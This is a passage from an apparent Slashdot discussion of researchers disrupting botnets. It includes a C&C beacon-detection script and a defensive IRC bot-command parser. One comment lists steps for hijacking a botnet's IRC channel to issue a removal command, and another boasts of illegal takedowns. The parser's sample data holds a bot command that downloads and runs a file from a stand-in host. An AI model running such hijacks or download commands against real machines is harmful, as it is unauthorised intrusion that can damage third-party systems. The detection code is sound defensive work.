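    flows.append((base + 77, "10.0.0.3", "203.0.113.9", 80, 2200))
    return flows


def suspect_c2(flows, min_clients=5, max_jitter=0.2, min_flows=3):
    """Return {"dst:port": {...}} for endpoints that look like a C&C master.

    An endpoint qualifies when at least min_clients distinct internal hosts
    talk to it and more than half of them do so at regular intervals
    (standard deviation of the gaps no more than max_jitter of the mean).
    """
    # (dst, dport) -> src -> sorted list of connection times
    by_endpoint = defaultdict(lambda: defaultdict(list))
    for ts, src, dst, dport, _nbytes in flows:
        if ip_address(src) in INTERNAL and ip_address(dst) not in INTERNAL:
            by_endpoint[(dst, dport)][src].append(ts)

    suspects = {}
    for (dst, dport), clients in by_endpoint.items():
        if len(clients) < min_clients:
            continue
        periods = []  # mean check-in interval of each regularly beaconing client
        for times in clients.values():
            times = sorted(times)
            if len(times) < min_flows:
                continue
            gaps = [b - a for a, b in zip(times, times[1:])]
            m = mean(gaps)
            if m > 0 and pstdev(gaps) / m <= max_jitter:
                periods.append(m)
        if 2 * len(periods) > len(clients):
            suspects[f"{dst}:{dport}"] = {
                "clients": len(clients),
                "beaconing": len(periods),
                "period_s": round(mean(periods)),
            }
    return suspects


if __name__ == "__main__":
    for endpoint, info in suspect_c2(constructed_flows()).items():
        print(endpoint, info)
```

The jitter threshold is the tuning knob: bots that randomise their check-in delay will need a looser value, and a looser value starts to catch legitimate pollers (NTP, software updaters), so compare each hit against the port and the destination's reputation before anyone touches a router ACL.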

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858965)

I wish ISPs would hold the lusers (criminally) responsible for this.

LOL:
1) Think what that would mean for most ISPs, because they would need to be accountable in their turn too.
2) They could try to pull the plug on that kind of user, but they are a majority. So the ISP won't bite the hand that feeds it.

Good for them. (4, Interesting)

deacon (40533) | more than 9 years ago | (#12858649)

From the FAS:

a group of high-profile security researchers is fighting back, vigilante-style.

This emotionally laden language has been deliberately chosen to make it sound like this activity is a "bad thing [tm]".

I truly believe it is the duty of every person to fight against clearly evil activity.

This includes a mugger hitting an old lady, a middle-aged man trying to drag a pre-teen girl (or boy) into a car idling in the street, and a person trying to kick in the door of the elderly couple down the street.

If the people disabling bot-nets make every effort to be certain they do not harm innocent or uninvolved people (and the standard here is very high), then they are doing a public service. (if they take the attitude, like some "anti-spam" people, of -> 'kill them all, let God sort them out, they are just assholes with very, very small peckers')

Those who believe the gub'mint is going to be johnny on the spot to fix all your boo-boos are sadly misguided: there is neither the manpower nor the reaction time to fix everything "bad" in the world. That depends on YOU.

Re:Good for them. (1)

mikael (484) | more than 9 years ago | (#12858995)

Not forgetting "happy slapping".

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12859087)

Call yourself the good guy or the hero of the day and you're allowed to do anything? Think:

Clear evil activity is much harder to define. Even 2 of the 3 examples you gave are clearly broken. The mugger seemed evil to me. The middle-aged man could be the father of the girl. And the person kicking in the door could be yourself reacting to a call for help from the elderly couple.

The lack of control makes vigilante actions mostly contribute more to the problem than to the solution.

A more effective approach? (1)

Illserve (56215) | more than 9 years ago | (#12858670)

I'm wondering why they aren't telling bots to self-destruct? It seems pretty obvious to me that the C&C structures could reform fluidly as you take them down? A Black hat has a list of his bots, if you nuke his IRC channel, he just spawns a new one, or moves to a new IRC network...

But if instead you tell all his bots to wipe themselves out, he's got to buy new ones. Yes those machines will surely get reinfected within a few days/weeks, but it will throw a much bigger wrench in the works.

How is this not the obvious approach? Why aren't they doing it? Or maybe they are and aren't stupid enough to tell the media....

Re:A more effective approach? (2, Informative)

NevarMore (248971) | more than 9 years ago | (#12858886)

Wipe themselves out how? They probably don't have self-destruct routines:
1. It's more code weight, harder to transport, run, and create.
2. The bot virus writers have probably read the villainy HOWTO, which advises against installing a self-destruct device because invariably the hero will use it as a very easy means to destroy the superweapon.

Re:A more effective approach? (1)

Illserve (56215) | more than 9 years ago | (#12858982)

If these bots have any kind of generalized means to execute commands on the local machine, there should be a way to force them to self destruct.

Bot flexibility is presumably valuable, giving their owners the ability to upgrade them in unforeseen ways.

Re:A more effective approach? (0)

Anonymous Coward | more than 9 years ago | (#12859102)

Most of them have a "download this file from the internet and run it" command.
That, or a format C: would certainly do the trick :)

Vigilantism? Or good citizenship? (1, Interesting)

Anonymous Coward | more than 9 years ago | (#12858714)

The word "vigilante" keeps getting bandied about by people who frankly probably just sit on their backsides all day and do nothing to try and help the problem.

The botnets represent a serious threat in all sorts of different ways. Spamming. Phishing. DDOS attacks. Extortion. Money laundering. Child pornography. These large armies of zombie PCs can be used for a variety of evil purposes.

Yah.. this should be the remit of law enforcement agencies.. but guess what. Nothing much is happening. Law enforcement is either waaay outta their league or swamped with other issues. So as good citizens of the internet, what should we do?

Well.. those people who keep moaning about "vigilantes" will do nothing.. except moan some more when their business is taken out by a DDOS-wielding extortionist. One basic obligation of all citizens is to protect others and to not ignore crimes when they are in progress. So, it is absolutely right and proper that people take direct action if it is clear that law enforcement agencies cannot.

You can target the botnet's C&C system. And there are a variety of ways you can do this - not all of which require immense technical skills. Sometimes that means you have to be slightly more "grey hat" than "white hat" in your approach.

But even if you are technically breaking the law to shut down a botnet.. exactly *who* are the victims? Nobody important, that's who - and they are usually hiding behind layer upon layer of false domain registrations, hijacked IP addresses and worse. In fact, most of the time there are no identifiable victims of this type of anti-botnet action at all - no valid names, companies or organisations. So who's gonna complain?

Personally, I'm not part of this group, but independently I have managed to shut down two large botnets.. at least temporarily. And I would do it again. But.. well, let's just say if you are involved in this sort of thing then it's better to stay an "Anonymous Coward".

I hope they invite the DShield guy (2, Interesting)

capedgirardeau (531367) | more than 9 years ago | (#12858718)

I can't find it on his site, but the guy who runs DShield was under a DDOS attack a few years ago and he managed to crack into the IRC channel the attacker used to control his bot network.

Apparently the attacker about crapped his drawers when instead of the usual bot replies to his commands an actual person started talking to him in his IRC channel.

http://dshield.org/ [dshield.org]

Re:I hope they invite the DShield guy (1)

n76lima (455808) | more than 9 years ago | (#12858906)

This sounds like Steve Gibson at Gibson Research.

http://www.grc.com/dos/grcdos.htm [grc.com]

This is the story about them being DDOS'ed and him cracking the IRC channel that was being used to run the bots.

The new superheroes...(whats their name?) (5, Funny)

droopycom (470921) | more than 9 years ago | (#12858723)

... fighting back the internet scumbags all over the planet, vigilante style...

Now if they could just have a cool name, we could have a new hit superheroes movie for this summer.

Any suggestion anyone ?
- The League of Net Shadows
- The League of Extraordinary Nerds
- The Fantastic Fourty

Come on give me something better ...

Re: Whats their name? = drone hunters (1)

coekie (603995) | more than 9 years ago | (#12858744)

The name actually used is "drone hunters"

Re:The new superheroes...(whats their name?) (1)

77Punker (673758) | more than 9 years ago | (#12858765)

Secure Internet Alliance

That's kinda cool, but I'm sure somebody can do better.

Re:The new superheroes...(whats their name?) (5, Funny)

UserChrisCanter4 (464072) | more than 9 years ago | (#12859042)

In honor of one of the common infection vectors: The Active X-Men.

Of course, the need to acknowledge both genders would probably make Active X-Force or Active X-Factor a better choice.

What's good for the goose... (4, Interesting)

argStyopa (232550) | more than 9 years ago | (#12858738)

So, how is this different from a "Star Chamber"?

I'd be interested to see how many people on /. who might applaud this pro-active white-hattery simultaneously strenuously object to the US Patriot Act, which is pretty much just allowing the government to do the same thing in real life.

book deal (1)

BobVila (592015) | more than 9 years ago | (#12858748)

They should write a book about this. It will be like a modern day Cuckoo's Egg.

Since malware writers aren't held liable... (1)

suitepotato (863945) | more than 9 years ago | (#12858808)

...and likely because their wares are useless until activated by an idiot end user, but mostly because government neither is competent enough to go after this nor should be trusted enough, then I don't see why extending antibodies to the malware problem doesn't deserve a shot.

With honeypots and careful use of infectable machines, the code that makes up these beasts can be examined and anti-malware can be released into the wild to destroy the infections wherever the anti-malware gets installed by an end user.

"Wow, I just cleaned spyware off my machine by looking for pr0n." Sort of like accidentally giving yourself life-saving medication because someone knew you were a pill popping idiot and they put the right stuff where you'd find it.

The question is, how would the corporate antimalware forces of right now react? "Symantec finds the W32.SpamZapFly2 to be a highly dangerous worm capable of closing far too many open SMTP relays (which is eating into our business) and recommends using our new tool to remove it as well as purchasing our latest antivirus software (which will be as ineffective as the last one) instead of relying on accidental infection with this so-called anti-bodyware (because while it has equal chance of happening, we'd prefer to be paid)."

omfg (-1, Troll)

f1r3w0rm (893378) | more than 9 years ago | (#12858882)

OK guys, why don't you take your heads out of your asses and use Google. For instance, if you wanted to steal a botnet and then erase it, here's a quick tutorial:
Step 1: make sure the topic command is enabled; if not, well, game over unless you have the passcode.
Step 2: if you are able to change the topic, depending on which trojan made the bot the command can vary; the standard is .rm to remove.
Step 3: kick 'em or CTCP VERSION 'em to rejoin and make the topic take effect.
Any comments, feel free to contact me @ sopsecurity{{{AT}}}gmail.com
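The "topic command" mechanism the comment above leans on is plain IRC: a bot learns the channel topic from the server's RPL_TOPIC (numeric 332) reply when it joins, and again from any TOPIC message while it sits in the channel, so whoever controls the topic controls the drones, which is why the comment's step 3 kicks the bots to force a rejoin. A honeypot or a network sensor watching the same IRC session can extract the commands the same way. The block below is an added example written for this page, not code from the commenter, the researchers or any bot family; the IRC lines in it are constructed, and the list of command verbs (rm, download, update, scan, ddos, login) is an assumption standing in for whatever vocabulary a given trojan actually uses, of which the page only names .rm and a download-and-run command.

```python
"""Extract bot commands from IRC traffic: RPL_TOPIC on join, TOPIC changes, PRIVMSG.

Added example for this discussion; not the commenter's or any bot's code.
"""
import re

# Assumption: a hypothetical verb list; each bot family has its own vocabulary.
BOT_VERBS = {"rm", "remove", "download", "update", "scan", "ddos", "login"}
# Commands in IRC bots are conventionally prefixed with '.', '!' or '$'
COMMAND_RE = re.compile(r"^[.!$]\s*([A-Za-z]+)")

# Constructed sample session as seen by a drone that just joined #secret
SAMPLE_LINES = [
    ":irc.example.net 332 drone42 #secret :.download http://203.0.113.7/up.exe 1",
    ":irc.example.net 366 drone42 #secret :End of /NAMES list.",
    ":h3rder!op@203.0.113.7 PRIVMSG #secret :everybody still here?",
    "PING :irc.example.net",
    ":h3rder!op@203.0.113.7 TOPIC #secret :.rm",
]


def parse_irc_line(line):
    """Split an RFC 1459 message into (prefix, command, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    body, sep, trailing = line.partition(" :")
    parts = body.split()
    if not parts:
        raise ValueError("empty IRC line")
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else None)


def extract_commands(lines):
    """Return the bot commands a drone would act on, in the order received."""
    found = []
    for line in lines:
        prefix, command, params, trailing = parse_irc_line(line)
        if trailing is None:
            continue
        if command == "TOPIC" and params:          # topic changed while joined
            channel = params[0]
        elif command == "332" and len(params) >= 2:  # RPL_TOPIC: topic on join
            channel = params[1]
        elif command == "PRIVMSG" and params:      # direct command in channel
            channel = params[0]
        else:
            continue
        m = COMMAND_RE.match(trailing)
        if m and m.group(1).lower() in BOT_VERBS:
            found.append({
                "channel": channel,
                "source": prefix.split("!")[0] if prefix else None,
                "via": command,
                "command": trailing,
            })
    return found


if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_LINES):
        print(cmd)
```

The point of keying on 332 as well as TOPIC is that a sensor which only watches for TOPIC messages never sees the command a drone receives at join time, which is exactly the one a controller relies on after a kick-and-rejoin; the real verb list has to come from reversing the specific trojan, as the article describes.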

C&C? (2, Insightful)

VStrider (787148) | more than 9 years ago | (#12858975)

I thought there was no such thing as a central C&C on botnets. An infected PC can be a member of many botnets. Today a PC is doing the bidding of joe hax0r, tomorrow it is doing the bidding of billy rox0r. Even if you shut down one C&C, the thousands of infected PCs remain infected and ready to join another botnet.

The only solution is user education.

Typical freeloaders (4, Funny)

Anonymous Coward | more than 9 years ago | (#12859012)

Using data from IP flows passing through routers and reverse-engineering tools to peek under the hood of new Trojans, Thompson said the researchers are able to figure out how the botnet owner sends instructions to the compromised machines.

This is a blatant violation of the trojans' EULAs if I ever saw one. The authors put a lot of work into writing those trojans. What gives "security researchers" such a sense of entitlement to that code? If they want to analyze malware, they should write their own!
